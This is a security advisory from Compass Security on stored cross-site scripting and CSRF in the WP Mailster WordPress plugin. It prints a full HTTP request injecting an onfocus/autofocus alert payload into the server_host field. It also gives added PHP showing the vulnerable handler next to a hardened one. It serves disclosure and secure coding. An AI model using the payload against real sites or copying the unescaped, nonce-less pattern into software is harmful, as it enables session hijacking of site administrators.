#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  WP Mailster [1]
# Vendor:   WP Mailster
# CSNC ID:  CSNC-2021-018
# CVE ID:   CVE-2021-28975
# Subject:  Cross-Site Scripting (XSS) [2] and Cross-Site Request Forgery (CSRF) [3]
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno (advisories@compass-security.com)
# Date:     21.10.2021
#
#############################################################

Introduction:
-------------

Mailster is a mailing list plugin for WordPress. It enables you to offer
automated electronic mailing lists. [4]

Compass Security discovered a security flaw in the WP Mailster plugin that
allows injecting client-side code into the WordPress admin panel. Furthermore,
because the plugin fails to validate anti-CSRF tokens, the client-side code
injection can be exploited remotely if an admin user with a valid session
visits a malicious website on the Internet.

Affected:
---------

Vulnerable:
 * 1.6.18.0

Not Vulnerable:
 * 1.6.19.0

No other version was tested, but older versions are believed to be vulnerable
as well.

Technical Description
---------------------

User input is not properly encoded when it is echoed back to the user. The
browser therefore interprets this data as executable code, which allows an
attacker to execute JavaScript in the WordPress admin console in the context of
the victim's browser. The stored payload fires when the victim opens, on the
mst_servers page, the details of a mail server whose "server_host",
"server_name" or "connection_parameter" value contains it.
The following HTTP request shows the injected XSS payload in the server_host
input parameter:

```
POST /wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=2 HTTP/1.1
Host: mydomain.local
Content-Length: 226
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://mydomain.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4028.0 Safari/537.36 autochrome/red
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://mydomain.local/wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=1&_wpnonce=845ead6aa9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7Cb3c7728f6c07e8049c6e0e8a37a8035e698ed9ac6006993f93b8b4eaf8a4667e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7C114a4995e06b2a7d23d13d2b289559678f13bac0233bf9184ce4a033041254a4; wp-settings-time-1=1615562785; PHPSESSID=3ppf9hugcjhni5gnosc0u4nfeb
Connection: close

sid=2&server_type=0&server_name=&server_host=csnc"onfocus=alert(1);//"+autofocus=&server_port=&secure_protocol=&secure_authentication=0&protocol=pop3&connection_parameter=&add_server=edit&sid=2&server_action=Update+Mail+Server
```

The HTTP response shows that the XSS payload is not encoded by the web
application, thus the payload is evaluated and executed as JavaScript code by
the browser:

```
HTTP/1.1 200 OK
Date: Fri, 12 Mar 2021 15:36:19 GMT
Server: Apache/2.4.46 (Debian)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/wordpress/
Set-Cookie: wp-settings-time-1=1615563379; expires=Sat, 12-Mar-2022 15:36:19 GMT; Max-Age=31536000; path=/wordpress/
Vary: Accept-Encoding
Content-Length: 35286
Connection: close
Content-Type: text/html; charset=UTF-8

[CUT BY COMPASS]
```
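The captured POST body above carries no _wpnonce field at all (the only nonce visible is in the GET URL of the Referer), and the value of server_host is written back into an HTML attribute unchanged. The following is an added illustration, not the vendor's code or its 1.6.19.0 patch, of a minimal mst_servers edit handler showing both defects and one way to close them with WordPress core APIs. The handler shape, the nonce action name mst_edit_server_<sid>, the helpers mst_get_server() and mst_save_server(), and the manage_options capability are assumptions; esc_attr(), esc_url(), check_admin_referer(), wp_nonce_field(), sanitize_text_field(), wp_unslash(), absint() and admin_url() are WordPress core functions.

```php
<?php
// Added example, not WP Mailster code. mst_get_server()/mst_save_server() are
// assumed helpers that load/persist a server record; 'mst_edit_server_<sid>' is
// an assumed nonce action name.

// --- Vulnerable pattern, as described in the advisory.
function mst_servers_edit_vulnerable() {
    if ( isset( $_POST['server_action'] ) ) {
        // No nonce check: a third-party page can make the admin's browser
        // send this POST with the WordPress session cookies attached (CSRF).
        $host = $_POST['server_host'];
        mst_save_server( (int) $_POST['sid'], $host ); // attacker value is stored
    }
    $server = mst_get_server( (int) $_GET['sid'] );
    // Raw echo: a stored value of  csnc"onfocus=alert(1);//" autofocus=
    // closes the value attribute, adds an onfocus handler and an autofocus
    // attribute, so the handler fires as soon as the edit page is rendered.
    echo '<input type="text" name="server_host" value="' . $server->host . '">';
}

// --- Hardened pattern.
function mst_servers_edit_hardened() {
    $sid = isset( $_REQUEST['sid'] ) ? absint( $_REQUEST['sid'] ) : 0;

    if ( isset( $_POST['server_action'] ) ) {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges.' );
        }
        // Dies unless a valid _wpnonce for this action (bound to the logged-in
        // user and a time window) is present in the POST; a cross-site form
        // cannot read or forge it.
        check_admin_referer( 'mst_edit_server_' . $sid );
        $host = sanitize_text_field( wp_unslash( $_POST['server_host'] ) );
        mst_save_server( $sid, $host );
    }

    $server = mst_get_server( $sid );
    $action = admin_url( 'admin.php?page=mst_servers&subpage=edit&sid=' . $sid );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    // Emits the hidden _wpnonce and _wp_http_referer fields the check expects.
    wp_nonce_field( 'mst_edit_server_' . $sid );
    // esc_attr() encodes " as &quot;, so the payload stays inside the attribute
    // value instead of terminating it.
    echo '<input type="text" name="server_host" value="' . esc_attr( $server->host ) . '">';
    echo '<input type="hidden" name="sid" value="' . esc_attr( $sid ) . '">';
    echo '<input type="submit" name="server_action" value="Update Mail Server">';
    echo '</form>';
}
```

sanitize_text_field() strips tags and control characters but does not encode quotes, so it is not a substitute for output encoding: esc_attr() at the echo is what neutralises the attribute break-out. The same two measures apply to server_name and connection_parameter, which the advisory names as equally affected, and to any other value the mst_servers page renders.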